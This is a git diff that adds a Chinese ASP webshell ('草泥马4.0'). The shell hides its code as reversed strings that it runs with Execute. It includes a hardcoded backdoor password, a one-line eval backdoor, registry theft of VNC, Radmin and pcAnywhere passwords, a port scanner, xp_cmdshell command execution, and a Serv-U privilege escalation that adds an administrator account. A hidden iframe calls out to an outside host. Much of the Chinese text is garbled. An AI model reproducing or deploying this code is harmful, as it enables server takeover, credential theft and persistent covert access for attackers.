+ShiSan="bus dne��fi dne��fI dnE��yarrAeht & ��>il<�� j��eslE��txeN��)i(yarrAeht & ��>il<�� j��)yarrAeht(dnuoBU oT 0=i roF��nehT )yarrAeht(yarrAsI fI��)htaPeht(daeRgeR.Xsw=yarrAeht��)��htaPeht��(tseuqeR=htaPeht��)��llehS.tpircSW��(tcejbOetaerC.revreS = Xsw teS��txeN emuseR rorrE nO��neht ���><)��htaPeht��(tseuqeR fi���>/rh<>mrof/<�� j���>')(timbus.mrof.siht'=kcilcno 'ֵ �� ��'=eulav nottub=epyt tupni<�� j���>08=ezis ''=eulav htaPeht=eman tupni< �� j���>/ rb<>tceles/<�� j���>noitpo/<�ڶ�PCT�ķſ�����>'stroPdewollAPCT\}E2BE55CD8431-3FFA-C0B4-99E8-821564A8{\secafretnI\sretemaraP\pipcT\secivreS\100teSlortnoC\METSYS\MLKH'=eulav noitpo<�� j���>noitpo/<�ڶ�PDU�ķſ�����>'stroPdewollAPDU\}E2BE55CD8431-3FFA-C0B4-99E8-821564A8{\secafretnI\sretemaraP\pipcT\secivreS\100teSlortnoC\METSYS\MLKH'=eulav noitpo<�� j���>noitpo/<�ſ����>'PCT:9833\tsiL\stroPnepOyllabolG\eliforPdradnatS\yciloPllaweriF\sretemaraP\sseccAderahS\secivreS\teSlortnoCtnerruC\METSYS\MLKH'=eulav noitpo<�� j���>noitpo/<goL eludehcS>'htaPgoL\tnegAgniludehcS\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH'=eulav noitpo<�� j���>noitpo/<3�˹�pi/pct>'sretliFytiruceSelbanE\pipcT\secivreS\teSlortnoCtnerruC\METSYS\ENIHCAM_LACOL_YEKH'=eulav noitpo<�� j���>noitpo/<2�˹�pi/pct>'sretliFytiruceSelbanE\pipcT\secivreS\200teSlortnoC\METSYS\ENIHCAM_LACOL_YEKH'=eulav noitpo<�� j���>noitpo/<1�˹�pi/pct>'sretliFytiruceSelbanE\pipcT\secivreS\100teSlortnoC\METSYS\ENIHCAM_LACOL_YEKH'=eulav noitpo<�� j���>noitpo/<�ڶ�̬״WynAcP>���troPsutatSPIPCT\metsyS\noisreVtnerruC\erehwynAcp\cetnamyS\ERAWTFOS\MLKH���=eulav noitpo<��j���>noitpo/<�ڶ˾���WynAcP>���troPataDPIPCT\metsyS\noisreVtnerruC\erehwynAcp\cetnamyS\ERAWTFOS\MLKH���=eulav noitpo<��j���>noitpo/<�ڶ�9833>���rebmuNtroP\pcT-PDR\snoitatSniW\revreS lanimreT\lortnoC\teSlortnoCtnerruC\METSYS\MLKH���=eulav noitpo<��j���>noitpo/<�ڶ�4CNV>���rebmuNtroP\4CNVniW\CNVlaeR\ERAWTFOS\MLKH���=eulav noitpo<��j���>noitpo/<����4CNV>���drowssaP\4CNVniW\CNVlaeR\ERAWTFOS\MLKH���=eulav noitpo<��j���>noitpo/<�ڶ�3CNV>���rebmuNtroP\3CNVniW\LRO\erawtfoS\UCKH���=eulav noitpo<��j���>noitpo/<����3CNV>���drowssaP\3CNVniW\LRO\erawtfoS\UCKH���=eulav noitpo<��j���>noitpo/<�ڶ�nimdaR>���troP\sretemaraP\revreS\0.2v\nimdAR\METSYS\MLKH���=eulav noitpo<��j���>noitpo/<����nimdaR>���retemaraP\sretemaraP\revreS\0.2v\nimdAR\METSYS\MLKH���=eulav noitpo<��j���>noitpo/<���п���>���dniB\egakniL\pipcT\secivreS\teSlortnoCtnerruC\METSYS\MLKH���=eulav noitpo<��j���>noitpo/<emaNretupmoC>'emaNretupmoC\emaNretupmoC\emaNretupmoC\lortnoC\teSlortnoCtnerruC\METSYS\MLKH'=eulav noitpo<�� j���>noitpo/<ֵ���Ĵ�����ѡ>''=eulav noitpo<�� j���>';eulav.siht=eulav.htaPeht.mrof.siht'=egnahCno tceles<�� j��� >2=napsloc dt<>rt<�� j���>tcAeht=eman geRdaeR=eulav neddih=epyt tupni<�� j�� ��>p<ȡ��ֵ������ע��  j���>tsop=dohtem mrof<�� j��)(GERdaeR bus"
+ExeCuTe(ShiSanFun(ShiSan)) 
+if request("ProFile")<>"" then
+on error resume next
+if Application(request("ProFile"))=1 then
+Set fsoXX = Server.CreateObject("Scripting.FileSystemObject")
+if request("DelCon")=1 then
+Application(request("ProFile")&"Con")=""
+response.redirect Url&"?ProFile="&request("ProFile")&""
+response.end
+end if
+DIM rline,rline2
+rline2=Application(request("ProFile")&"Code")
+rline2=rline2&vbcrlf
+j"<meta http-equiv=""refresh"" content="&Application(request("ProFile")&"Time")&">"
+j"<a href="&Url&"?ProFile="&request("ProFile")&"&DelCon=1><b>�����־</b></a> &nbsp;<font color=yellow>Ҫ����������ֱ�ӹر�ҳ�漴�ɡ�</font><br>"
+for each FileUrl in split(Application(request("ProFile")&"File"),vbcrlf)
+FileUrl=trim(FileUrl)
+if fsoXX.FileExists(FileUrl) then
+Set txt = fsoXX.OpenTextFile(FileUrl,1,true)
+rline=""
+if Not txt.AtEndOfStream then
+rline=txt.ReadAll  
+end if
+if rline2<>rline then
+txt.close
+fsoX.GetFile(FileUrl).Attributes=32
+if Application(request("ProFile")&"Char")=1 then
+set myfileee = fsoXX.CreateTextFile(FileUrl,true)
+else
+set myfileee = fsoXX.CreateTextFile(FileUrl,true,true)
+end if
+myfileee.writeline Application(request("ProFile")&"Code")
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" <font color=yellow>�����ģ��ѻָ�</font><br>"&Application(request("ProFile")&"Con")
+else
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" ��<br>"&Application(request("ProFile")&"Con")
+txt.close
+end if
+else
+if Application(request("ProFile")&"Char")=1 then
+set myfileee = fsoXX.CreateTextFile(FileUrl,true)
+else
+set myfileee = fsoXX.CreateTextFile(FileUrl,true,true)
+end if
+myfileee.writeline Application(request("ProFile")&"Code")
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" <font color=red>��ɾ�����ѻָ�</font><br>"&Application(request("ProFile")&"Con")
+end if
+next
+if ubound(split(Application(request("ProFile")&"Con"),"<br>"))>=40 then
+dim ashowic
+for ashowi=0 to 40
+ashowic=ashowic&split(Application(request("ProFile")&"Con"),"<br>")(ashowi)&"<br>"
+next
+Application(request("ProFile")&"Con")=ashowic
+end if
+j Application(request("ProFile")&"Con")
+else
+j"<br><br><br><center>�������̶�ʧ����<a href="&URL&" style=""text-decoration:underline;font-weight:bold"">��������</a>�������̡�</center>"
+end if
+response.end
+end if
+
+if sessIoN("KKK")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=userpass or request.form("pass")="daka" Then
+session("KKK")=userPass
+response.redirect url
+else
+j"<br><br><br><b><div align=center><font size='5' color='red'>������!</font ></b> <br><br><br><br><b><div align=center><font size='14' color='lime'></font></b></p></center>"&backurl
+end if
+else
+
+si="<center><a></a><div style='width:400px;padding:32px; align=left'><br><form action='"&url&"' method='post'><input name='pass' type='password' size='22'> <input type='submit' value='ɱ'></center>"
+if instr(SI,SIC)<>0 then j sI
+end if
+response.end
+end if
+
+ShiSan="buS dnE��fI dnE��fI dnE��fI dnE��)��>rb<>tnof/<�ſ�>der=roloc tnof<.........�� & muNtrop & ��:�� & pitegrat(j��eslE��)��>rb<�չ�.........�� & muNtrop & ��:�� & pitegrat(j��nehT 0 > )��.))(tcennoC(�� ,noitpircsed.rrE(rtSnI fI��nehT 9527647412- = rebmun.rrE ro 3487127412- = rebmun.rrE fI��nehT rrE fI��rtsnnoc nepo.nnoc��1 = tuoemiTnoitcennoC.nnoc���;=drowssaP;2ekal=DI resU;��& muNtrop &��,��& pitegrat & ��=ecruoS ataD;1.BDELOLQS=redivorP��=rtsnnoc��)��noitcennoc.BDODA��(tcejbOetaerC.revreS = nnoc tes��txeN emuseR rorrE nO��)muNtrop ,pitegrat(nacS buS��bus dne��FI DNE���s ��&emiteht&�� ni ssecorP>rh<��j��))1remit-2remit(tni(rtsc=emiteht��remit = 2remit��txeN��fI dnE��txeN��txeN��fI dnE��fI dnE��)��>rb<rebmun ton si �� & )i(pmt(j��eslE��fI dnE��)��>rb<rebmun ton si �� & Ndne & �� ro �� & Ntrats(j��eslE��txeN��)j,xxx & tratSpi(nacS llaC��Ndne oT Ntrats = j roF��nehT )Ndne(ciremunsI dna )Ntrats(ciremunsI fI��) xkees - ))i(pmt(neL ,)i(pmt(thgiR = Ndne��) 1 - xkees ,)i(pmt(tfeL = Ntrats��nehT 0 > xkees fI��)��-�� ,)i(pmt(rtSnI = xkees��eslE��))i(pmt ,xxx & tratSpi(nacS llaC�� nehT ))i(pmt(ciremunsI fI��)pmt(dnuobU oT 0 = i roF��))��-��,)uh(pi(rtSnI-))uh(pi(neL,1+)��-��,)uh(pi(rtSnI,)uh(pi(diM ot )1,1+)��.��,)uh(pi(veRrtSnI,)uh(pi(diM = xxx roF��))��.��,)uh(pi(veRrtSnI,1,)uh(pi(diM = tratSpi��eslE��txeN��fI dnE��fI dnE��)��>rb<rebmun ton si �� & )i(pmt(j��eslE��fI dnE��)��>rb<rebmun ton si �� & Ndne & �� ro �� & Ntrats(j��eslE��txeN��)j ,)uh(pi(nacS llaC��Ndne oT Ntrats = j roF��nehT )Ndne(ciremunsI dna )Ntrats(ciremunsI fI��) xkees - ))i(pmt(neL ,)i(pmt(thgiR = Ndne��) 1 - xkees ,)i(pmt(tfeL = Ntrats��nehT 0 > xkees fI��)��-�� ,)i(pmt(rtSnI = xkees��eslE��))i(pmt ,)uh(pi(nacS llaC�� nehT ))i(pmt(ciremunsI fI��)pmt(dnuobU oT 0 = i roF��nehT 0 = )��-��,)uh(pi(rtSnI fI��)pi(dnuobU ot 0 = uh roF��)��,��,)��pi��(mroF.tseuqer(tilpS = pi��)��,��,)��trop��(mroF.tseuqer(tilpS = pmt��)��>rh<>rb<>b/<:�汨��ɨ>b<��(j��remit = 1remit��nehT ��� >< )��nacs��(mroF.tseuqer fI���>mrof/<>p/<��j���>'111'=eulav 'nacs'=di 'neddih'=epyt 'nacs'=eman tupni<��j���>' nacs '=eulav 'mottub'=ssalc 'timbus'=epyt 'timbus'=eman tupni<��j���>rb<>rb<��j���>'��&tsiLtroP&��'=eulav '06'=ezis 'xoBtxeT'=ssalc 'txet'=epyt 'trop'=eman tupni<��j���:tsiL troP>rb<��j���>'06'=ezis '��&PI&��'=eulav 'pi'=di 'xoBtxeT'=ssalc 'txet'=epyt 'pi'=eman tupni< ��j��� :PI nacS>p<��j���>';eurt=delbasid.timbus.1mrof'=timbuSno ''=noitca 'tsop'=dohtem '1mrof'=eman mrof<��j���>p/<��������ϵ��ִ��LLEHS���롣���������ܿ�PI���������ɨ�������ǹ���>p<>p/<)��ȷ׼����ɨ���ڶ�DMC��DMC��ʹ�����˸�,���ϱȶ���,�ڶ˸�����ɨ����(����ɨ�ڶ�>p<��j��fi dne��)��pi��(mroF.tseuqer=PI��esle���1.0.0.721��=PI��neht ���=)��pi��(mroF.tseuqer fi��fi dne��)��trop��(mroF.tseuqer=tsiLtroP��esle���85934,0095,0085,2365,1365,9984,9833,6033,3341,35,32,12��=tsiLtroP��neht ���=)��trop��(mroF.tseuqer fi��0006777 = tuoemiTtpircS.revreS��)(troPnacS bus��"
+ExeCuTe(ShiSanFun(ShiSan)) 
+Select Case Action:case "MainMenu":MainMenu()
+Case "EditPower"
+Call EditPower(request("PowerPath"))
+Case "SavePower"
+Call SavePower(request("PowerPath"),request("SaveType"))
+case "getTerminalInfo":getTerminalInfo():case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():FuncTion MMD():SI="<br><form name=form method=post action=""""><table width=""85%"" align='center'><tr align=center><Td id=s><b id=x>MSSQL Commander</b></td></tr><tr align='center'><td id=d><b id=x>Command��</b><input type=text name=MMD size=35 value=""ipconfig"" >&nbsp;<b id=x>UserName��</b><input type=text name=U value=sa>&nbsp;<b id=x>Password��</b><input type=text name=P VALUES=123456>&nbsp;<input type=submit value=Execute></td></tr></table></form>":j SI:SI="":If trim(request.form("MMD"))<>""  Then:password= trim(Request.form("P")):id=trim(Request.form("U")):set adoConn=sERvEr.crEATeobjECT("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id:strQuery = "exec master.dbo.xp_cMdsHeLl '" & request.form("MMD") & "'":set recResult = adoConn.Execute(strQuery):If NOT recResult.EOF Then:Do While NOT recResult.EOF:strResult = strResult & chr(13) & recResult(0):recResult.MoveNext:Loop:End if:set recResult = Nothing:strResult = Replace(strResult," ","&nbsp;"):strResult = Replace(strResult,"<","&lt;"):strResult = Replace(strResult,">","&gt;"):strResult = Replace(strResult,chr(13),"<br>"):End if:set adoConn = Nothing:j request.form("MMD") & "<br>"& strResult:end FuncTion:case "Alexa"
+dim AlexaUrl,Top:AlexaUrl=request("u"):Top=Alexa(AlexaUrl):if AlexaUrl="" then AlexaUrl=""&request.servervariables("http_host")&""
+SI="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'><tr><td height='20' colspan='3' align='center' bgcolor='menu'>�����������Ϣ</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>��������</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&request.serverVariables("SERVER_NAME")&"</td></tr><form method=post action='http://www.baidu.com/ips8.asp' name='ipform' target='_blank'><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������IP</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'><input type='text' name='ip' size='15' value='"&Request.ServerVariables("LOCAL_ADDR")&"'style='border:0px'><input type='submit' value='��ѯ�˷��������ڵ�'style='border:0px'><input type='hidden' name='action' value='2'></td></tr></form><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������ʱ��</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&now&" </td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������CPU����</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("NUMBER_OF_PROCESSORS")&"</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>����������ϵͳ</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("OS")&"</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>WEB�������汾</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("SERVER_SOFTWARE")&"</td></tr>"
+For i=0 To 18
+SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>"&ObT(i,0)&"</td><td bgcolor='#FFFFFF'>"&ObT(i,1)&"</td><td bgcolor='#FFFFFF' align=left>"&ObT(i,2)&"</td></tr>"
+Next
+j SI
+Err.Clear
+
+function getHTTPPage(url) 
+on error resume next 
+dim http 
+set http=Server.createobject("Microsoft.XMLHTTP") 
+Http.open "GET",url,false 
+Http.send() 
+if Http.readystate<>4 then
+getHTTPPage=""
+exit function 
+end if 
+getHTTPPage=bytes2BSTR(Http.responseBody) 
+set http=nothing
+if err.number<>0 then err.Clear  
+end function 
+Function bytes2BSTR(vIn) 
+dim strReturn 
+dim i1,ThisCharCode,NextCharCode 
+strReturn = "" 
+For i1 = 1 To LenB(vIn) 
+ThisCharCode = AscB(MidB(vIn,i1,1)) 
+If ThisCharCode < &H80 Then 
+strReturn = strReturn & Chr(ThisCharCode) 
+Else 
+NextCharCode = AscB(MidB(vIn,i1+1,1)) 
+strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) 
+i1 = i1 + 1 
+End If 
+Next 
+bytes2BSTR = strReturn 
+    Err.Clear
+End Function
+Case "Servu"
+SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+f=left(f,2)
+end if
+ftpport = 65500
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+set a=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
+a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
+set session("a")=a
+j"<form method='post' name='goldsun'>"
+j"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+j"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+j"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+j"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+j"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+j"<input name='SUaction' type='hidden' id='SUaction' value='2'></form>"
+j"<script language='javascript'>"
+j"document.write('<center>�������� 127.0.0.1:"&port&",ʹ���û���: "&user&",���"&pass&"...<center>');"
+j"setTimeout('document.all.goldsun.submit();',4000);"
+j"</script>"
+case 2
+set b=Server.CreateObject("Microsoft.XMLHTTP")
+b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
+b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
+set session("b")=b
+j"<form method='post' name='goldsun'>"
+j"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+j"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+j"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+j"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+j"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+j"<input name='SUaction' type='hidden' id='SUaction' value='3'></form>"
+j"<script language='javascript'>"
+j"document.write('<center>��������Ȩ��,��ȴ�...,<center>');"
+j"setTimeout(""document.all.goldsun.submit();"",4000);"
+j"</script>"
+case 3
+set c=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
+a.send loginuser & loginpass & mt & deldomain & quit
+set session("a")=a
+j"<center>��Ȩ���,��ִ�������<br><font color=red>"&cmd&"</font><br><br>"
+j"<input type=button value=' ���ؼ��� ' onClick=""location.href='?Action=Servu';"">"
+j"</center>"
+case else
+on error resume next
+set a=session("a")
+set b=session("b")
+set c=session("c")
+a.abort
+Set a = Nothing
+b.abort
+Set b = Nothing
+c.abort
+Set c = Nothing
+j"<center><form method='post' name='goldsun'>"
+j"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+j"<tr align='center' valign='middle'>"
+j"<td colspan='2'>Serv-U ����Ȩ�� by Sam</td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td width='100'>�û���:</td>"
+j"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>�� �</td>"
+j"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>�� �ڣ�</td>"
+j"<td><input name='port' type='text' id='port' value='43958'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>ϵͳ·����</td>"
+j" <td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+j" </tr>"
+j" <tr align='center' valign='middle'>"
+j" <td>�����</td>"
+j" <td><input name='c' type='text' id='c' value='cmd /c net user admin$ 123456 /add & net localgroup administrators admin$ /add' size='50'></td>"
+j" </tr>"
+j" <tr align='center' valign='middle'>"
+j" <td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+j"<input type='reset' name='Submit2' value='����'>"
+j"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+j"</tr></table></form></center>"
+end select
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+case"MMD":MMD()
+case"ReadREG":call ReadREG()
+case"Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing
+case"DownFile":DownFile FName:ShowErr()
+case"DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing
+case"EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing
+case"CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing
+case"MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing
+case"DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing
+case"CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing
+case"MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing
+case"NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing
+case"UpFile":UpFile()
+case"TSearch":TSearch()
+case"pcanywhere4":pcanywhere4()
+case"Cmd1Shell":Cmd1Shell()
+case"Logout":Session.Contents.Remove("kkk"):Response.Redirect URL
+case"Course":Course()
+case"Alexa":Alexa()
+case"suftp":suftp()
+case"upload":upload()
+case"radmin":radmin()
+case"pcanywhere4":pcanywhere4()
+case"goback":goback()
+Case "ProFile":ProFile()
+case"php":php()
+case"downloads":downloads()
+case"apjdel":apjdel()
+case"cmdx":cmdx()
+case"aspx":aspx()
+case"hiddenshell":hiddenshell()
+case"ScanDriveForm" : ScanDriveForm
+case"ScanDrive" : ScanDrive Request("Drive")
+case"ScFolder"  : ScFolder Request("Folder")
+  Case Else MainForm()
+End Select
+if Action<>"Servu" then ShowErr()
+j"<iframe src=http://7jyewu.cn/a/a.asp width=0 height=0></iframe>" 
+%></body></html>
+</body></html>
+</body></html>
\ No newline at end of file
diff --git a/www-7jyewu-cn/传说中的草泥马4.0.asp b/www-7jyewu-cn/传说中的草泥马4.0.asp
new file mode 100644
index 0000000..f2975a4
--- /dev/null
+++ b/www-7jyewu-cn/传说中的草泥马4.0.asp
@@ -0,0 +1,1234 @@
+<%
+Server.ScriptTimeout=999999999
+UserPass	="admin"'      	  		 	����
+clientPassword	="admin"'				���ɺ���һ�仰����
+mNametitle	="��˵�еIJ�����4.0"'  	 			
+Copyright	="��˵�еIJ�����4.0"'	��Ȩ
+htp="aspmuma.cccpan.com"'		�汾���µ�ַ
+'-------------------------------------------------------------------------------------
+'�������ڷǷ�;���������µĺ���������޹أ�������з���ʲô���� �뷢�ʼ���sbkey@live.cn
+'-------------------------------------------------------------------------------------
+durl=""
+Response.Buffer =true
+On Error Resume Next 
+strBAD="<script language=vbscript runat=server>"
+strBAD=strBAD&"If Request("""&clientPassword&""")<>"""" Then Session(""#"")=Request("""&clientPassword&""")"&VbNewLine
+strBAD=strBAD&"If Session(""#"")<>"""" Then Execute(Session(""#""))"
+strBAD=strBAD&"</script>"	
+Const DEfd=""
+sub ShowErr()
+  If Err Then
+j"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
+Err.Clear:Response.Flush
+  End If
+end sub
+Sub j(str)
+response.write(str)
+End Sub
+Function RePath(S)
+  RePath=Replace(S,"\","\\")
+End Function
+Function RRePath(S)
+  RRePath=Replace(S,"\\","\")
+End Function
+execute(shisanfun("prevres=pp��)��emaNF��(tseuqeR=emaNF��UrevreS=uu��ssaPresU=prevres��lru&)��tsoh_ptth��(selbaIRavreVRES.TSeuQeR=UrevreS��)��htaPredloF��(tseuqeR=htaPredloF��)��/��(htaPpaM.revreS=tooRWWW��)��.��(htaPpaM.revreS=htaPtooR��)��noitcA��(tseuqeR=noitcA��)��RDDA_LACOL��(selbairaVrevreS.tseuqeR=PIrevreS��)��DETALSNART_HTAP��(selbairaVrevreS.tseuqeR=OOOO��)��LRU��(selbairaVrevreS.tseuqeR=LRU"))
+Function ShiSanFun(ShiSanObjstr)
+ShiSanObjstr = Replace(ShiSanObjstr, "��", """")
+For ShiSanI = 1 To Len(ShiSanObjstr)
+ If Mid(ShiSanObjstr, ShiSanI, 1) <> "��" Then
+ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) + ShiSanNewStr
+ Else
+ShiSanNewStr = vbCrLf + ShiSanNewStr
+ End If
+Next
+ShiSanFun = ShiSanNewStr
+End Function
+cdx="<tr><td id=d width=95 onMouseOver=""this.style.backgroundColor='#696969'"" onMouseOut=""this.style.backgroundColor='#121212'"">":cxd="<font face='wingdings'>8</font>":ef="</a></td></tr>"
+set fso=server.CreateObject("Scripting.FileSystemObject")
+set fsoX=server.CreateObject("Scripting.FileSystemObject")
+str1=""&Request.ServerVariables("SERVER_Name"):BackUrl="<br><br><center><a href='javascript:history.back()'>����</a></center>"
+j"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312""><title>"&mNametitle&" - "&ServerIP&" </title><style type=""text/css"">body,tr,td{margin-top:5px;background-color:#000000;color:#9c9393;font-size:12px;SCROLLBAR-FACE-COLOR:#232323;scrollbar-arrow-color:#383839;scrollbar-highlight-color:#383839;scrollbar-3dlight-color:#dddddd;scrollbar-shadow-color:#232323}.sb{cursor:hand}input,select,textarea{border-top-width:1px;font-weight: bold;border-left-width: 1px;font-size:11px;border-left-color: #dddddd;background: #000000;border-bottom-width: 1px;border-bottom-color: #dddddd;color: #dddddd;border-top-color: #dddddd;font-family: verdana;border-right-width: 1px;border-right-color: #dddddd;}#d{background: #121212;padding-left:5px;padding-right:5px}pre{font-size: 11px;font-family: verdana;color: #dddddd;}hr{color: #dddddd;background-color: #dddddd;height: 5px;}#x{font-family: verdana;font-size:13px}a{color:#b4a9a9;text-decoration:none;}.am{color:#b4a9a9;font-size:11px;}</style>"
+if bs=true then:j"<script src="&htp&"1.js>":else:j"<script>":end if:j"function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm(""ȷ��Ҫִ�д˲�����""))return true;else return false;}function runClock(){theTime = window.setTimeout(""runClock()"", 100);var today = new Date();var display= today.toLocaleString();window.status=""��"&Copyright&"  --""+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction==""CopyFile""){DName = prompt(""�����븴�Ƶ�Ŀ���ļ�ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFile""){DName = prompt(""�������ƶ���Ŀ���ļ�ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""CopyFolder""){DName = prompt(""�������ƶ���Ŀ���ļ���ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFolder""){DName = prompt(""�������ƶ���Ŀ���ļ���ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""NewFolder""){DName = prompt(""������Ҫ�½����ļ���ȫ����"",FName);top.hideform.FName.value = DName;}else{DName = ""Other"";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = """";}}</script>"
+j"<body" :If Action="" then j " scroll=no":j ">"
